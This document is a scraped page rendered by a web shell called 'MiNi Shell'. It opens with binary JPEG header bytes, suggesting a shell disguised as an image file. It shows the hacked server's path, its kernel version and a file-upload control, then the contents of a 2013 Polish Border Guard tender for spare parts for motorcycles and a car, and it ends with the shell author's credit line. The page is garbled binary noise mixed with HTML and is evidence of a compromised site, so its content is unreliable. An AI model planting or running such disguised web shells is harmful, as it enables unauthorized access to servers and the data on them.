JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130314/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130314/39071-N-2013.html

<p class="kh_header"><b>Przemyśl: Dostawa części zamiennych do pojazdów służbowych dla BiOSG</b><br>
<b>Numer ogłoszenia: 39071 - 2013; data zamieszczenia: 14.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bieszczadzki Oddział Straży Granicznej , ul. Adama Mickiewicza 34, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6732153, 6732087, faks 016 6763271.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części zamiennych do pojazdów służbowych dla BiOSG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Dostawa części zamiennych do pojazdów służbowych dla BiOSG:
CZĘŚĆ I	-   Motocykl RIEJU MR4T 125
CZĘŚĆ II	-   Motocykl KTM 400 LC4-E
CZĘŚĆ III	-   DAEWOO TF69V LANOS 1,5B 16V
2.	 Zamawiający wymaga aby:
a.	Części zamienne były fabrycznie nowe, kompletne, sprawne technicznie, w gatunku pierwszym, zapakowane i posiadające na opakowaniu oznaczenie numeru katalogowego;
b.	Części zamienne były oryginalne lub o porównywalnej jakości w rozumieniu § 2 pkt 21 i 22 Rozporządzenia Rady Ministrów z dnia 08 października 2010 r. (Dz. U. z 2010 r. Nr 198, poz. 1315) w sprawie wyłączenia określonych porozumień wertykalnych w sektorze pojazdów samochodowych spod zakazu porozumień ograniczających konkurencję i mają zastosowanie do pojazdu opisanego w tabeli nr 1 dołączonej do druku ofertowego;
c.	Wykonawca dostarczył asortyment na swój koszt;
d.	Wykonawca udzielił pisemnej gwarancji na dostarczony asortyment na okres co najmniej                  12 miesięcy liczony od daty dostarczenia go do siedziby Zamawiającego.
3.	Wykonawcą zamówienia mogą być producenci, dystrybutorzy lub sprzedawcy asortymentu określonego w opisie przedmiotu zamówienia.
4.	Zamawiający dopuszcza złożenie oferty równoważnej.
5.	Numery katalogowe umieszczone w części II zamówienia są podane pomocniczo w celu ułatwienia Wykonawcy doboru ewentualnych zamienników.
6.	W przypadku zaoferowania produktu o innym numerze katalogowym niż wskazany przez Zamawiającego należy wpisać w kolumnie nr 3 w tabeli nr II stanowiącej załącznik do druku ofertowego nazwę producenta części zamiennej oraz numer katalogowy. W przypadku braku wskazania w kolumnie nr 3 nazwy producenta oraz numeru katalogowego, Zamawiający uzna, iż Wykonawca dostarczy asortyment wskazany przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.41.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W  celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 pkt 5 ustawy: Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej 
2. Pełnomocnictwo jeżeli oferta i załączniki zostaną podpisane przez upoważnionego przedstawiciela Wykonawcy. Z treści pełnomocnictwa ma wynikać zakres czynności, do których została umocowana osoba działająca w imieniu i na rzecz Wykonawcy. Pełnomocnictwo to musi zostać dołączone do oferty i  musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa ma być poświadczona notarialnie).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy p.z.p. Zamawiający dopuszcza możliwość zmiany umowy o zamówienie publiczne w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, z zachowaniem formy pisemnej, w zakresie ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bieszczadzki.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bieszczadzki Oddział Straży Granicznej
ul. Mickiewicza 34
37 - 700 Przemyśl
Sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 09:30, miejsce: Bieszczadzki Oddział Straży Granicznej
ul. Mickiewicza 34
37 - 700 Przemyśl
Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MOTOCYKL RIEJU MR4T 125,SILNIK 5PA,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	WYŚWIETLACZ KILOMETRÓW	szt	5
2.	CZUJNIK STOP RĘCZNY	szt	3
3.	LINKA SPRZĘGŁA	szt	7
4.	CZUJNIK STOP NOŻNY	szt	5
5.	CZUJNIK PRĘDKOŚCI W TYLNYM KOLE	szt	3
6	ŁOŻYSKO GŁÓWKI RAMY	szt	8
7	SYGNAŁ DŹWIĘKOWY	szt	3
8	LAMPA TYŁ	szt	1
9	KIERUNKOWSKAZ TYŁ LEWY	szt	1
10	KIERUNKOWSKAZ TYŁ PRAWY	szt	2
11	LINKA GAZU	szt	1
12	POMPA HAMULCOWA	szt	1
13	USZCZELNIACZ WAŁKA ZMIANY BIEGÓW	szt	5
14	MODUŁ ZAPŁONOWY	szt	1
15	ZACISK HAMULCA TYŁ	szt	1
16	DŹWIGNIA SPRZĘGŁA	szt	2
17	ZAWÓR SSĄCY	szt	1
18	ZAWÓR WYDECHOWY	szt	1
19	USZCZELNIACZ TRZONKA ZAWORU	szt	2
20	USZCZELKA GŁOWICY 	szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.41.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MOTOCYKL KTM 400 LC4-E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	TŁOK 577.30.007.000/I		szt	2
2.	CYLINDER 576.30.005.100		szt	2
3.	USZCZELKA 580.30.030.000		szt	2
4.	USZCZELKA GŁOWICY 575.30.036.000		szt	8
5.	GŁOWICA 576.36.020.300		szt	8
6.	TERMOSTAT 583.35.017.000		szt	8
7.	TARCZA HAMULCOWA - TYŁ 580.10.060.600		szt	5
8.	USZCZELNIACZ 32X52X7 0760325272		szt	10
9.	MOCOWANIE AMORTYZATORA TYŁ 583.03.080.244		szt	6
10	REGULATOR NAPIĘCIA 584.11.034.100		szt	7
11.	POMPA WODY 583.35.050.044		szt	2
12.	CZUJNIK TEMPERATURY 580.35.045.000		szt	3
13.	PODKŁADKA 0603 142 015		szt	8
14.	ROZRUSZNIK 584.40.001.000		szt	4
15.	SPRZĘGŁO JEDNOKIERUNKOWE 584.40.026.000		szt	5
16.	USZCZELKA 584.40.042.000		szt	5
17.	TARCZA HAMULCOWA - PRZÓD 583.09.060.100		szt	2
18.	MOCOWANIE DŹWIGNI SPRZĘGŁA 584.02.040.100		szt	6
19.	MOCOWANIE HAMULCA RĘCZNEGO 584.13.001.000		szt	2
20.	LINKA LICZNIKA 579.14.055.100		szt	8
21.	LINKA SPRZĘGŁA 584.02.090.000		szt	8
22.	OŚ TYLNA 502.10.085.044		szt	3
23.	NAKRĘTKA 503.10.099.000		szt	3
24.	ISKROWNIK 584.39.004.000		szt	5
25.	LUSTERKO  583.12.040.200		szt	4
26.	LAMPA TYŁ 584.14.040.100		szt	2
27.	LAMPA PODŚWIETLENIA TABLICY 584.14.047.000		szt	2
28.	NAPĘD LICZNIKA 503.14.050.000		szt	4
29.	DŹWIGNIA ZMIANY BIEGÓW 584.34.031.144		szt	2
30.	CZUJNIK STOP NOŻNY 503.11.051.100		szt	2
31.	STOPKA BOCZNA 579.03.023.000		szt	1
32.	MOCOWANIE 584.03.028.000		szt	1
33.	SPRĘŻYNA 510.03.021.000		szt	2
34.	WSPORNIK 511.03.023.055		szt	1
35.	NAKŁADKA 362.05.018.000		szt	1
36.	KRANIK PALIWA 511.07.004.000		szt	6
37.	KOREK WLEWU PALIWA 584.07.008.100		szt	1
38.	DŹWIGNIA SPRZĘGŁA 584.02.042.000		szt	4
39.	CZUJNIK STOP RĘCZNY 		szt	2
40.	OŚ PRZEDNIA 503.09.081.200		szt	2
41.	NAKRĘTKA 503.09.082.100		szt	2
42.	ŁOŻYSKO GŁÓWKI RAMY 542.01.081.000		szt	10
43.	MISECZKA 546.01.084.100		szt	5
44.	PIERŚCIEŃ 546.01.184.000		szt	5
45.	MISECZKA 542.01.086.000		szt	5
46.	WSPORNIK DOLNY KIEROWNICY 590.01.039.000		szt	1
47.	WSPORNIK GÓRNY KIEROWNICY 503.01.038.000		szt	2
48.	ŚRUBA 0984 100 703		szt	2
49.	ŚRUBA 0015 080303		szt	16
50.	DŹWIGNIA HAMULCA 502.13.020.000		szt	3
51.	USZCZELNIACZ 26X37X7 0760263770		szt	10
52.	USZCZELNIACZ 40X52X7 0760405270		szt	10
53.	KOŁO TYŁ KOMPLETNE 584.10.001.244/30		szt	1
54.	SYGNAŁ DŹWIĘKOWY 503.11.060.000		szt	3
55.	KIERUNKOWSKAZ TYŁ LEWY 584.14.025.000/30		szt	1
56.	PIERŚCIEŃ 4357.0099		szt	4
57.	PIERŚCIEŃ 4357.0019		szt	4
58.	USZCZELNIACZ 4357.0092		szt	4
59.	USZCZELNIACZ 4357.0140		szt	4
60.	PIERSCIEŃ 4357.0008		szt	4
61.	OSŁONA 4357.0094		szt	4
62.	IGLICA 584.31.034.6G5		szt	4
63.	PLASTIK IGLICY 584.31.035.000		szt	4
64.	ZAWÓR IGLICY 584.31.020.000		szt	4
65.	ŚRUBA REGULACJI 584.31.017.000		szt	4
66.	ZAWÓR SSĄCY 580.36.030.000		szt	16
67.	ZAWÓR WYDECHOWY 580.36.031.000		szt	16
68.	USZCZELNIACZ TRZONKA ZAWORU 580.36.028.000		szt	32
69.	USZCZELKA 580.36.053.000		szt	10
70.	USZCZELKA 580.36.041.000		szt	10
71.	USZCZELKA 581.36.043.000		szt	5
72.	CEWKA 584.39.006.000		szt	2
73.	USZCZELKA 584.30.040.000		szt	7
74.	SZNUR USZCZELNIAJĄCY 583.05.053.001		szt	3
75.	USZCZELKA 583.07.106.100		szt	6
76.	TULEJKA 564.01.041.100		szt	6
77.	TULEJKA 564.01.040.000		szt	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.41.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DAEWOO TF69V LANOS 1,5B 16V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	USZCZELNIACZ WAŁU PRZÓD	szt	1
2.	USZCZELNIACZ WAŁKA ROZRZĄDU	szt	2
3.	USZCZELNIACZ TRZONKA ZAWORU	szt	16
4.	POPYCHACZ HYDRAULICZNY	szt	16
5.	USZCZELKA POKRYWY ZAWORÓW KOMPLETNA	szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com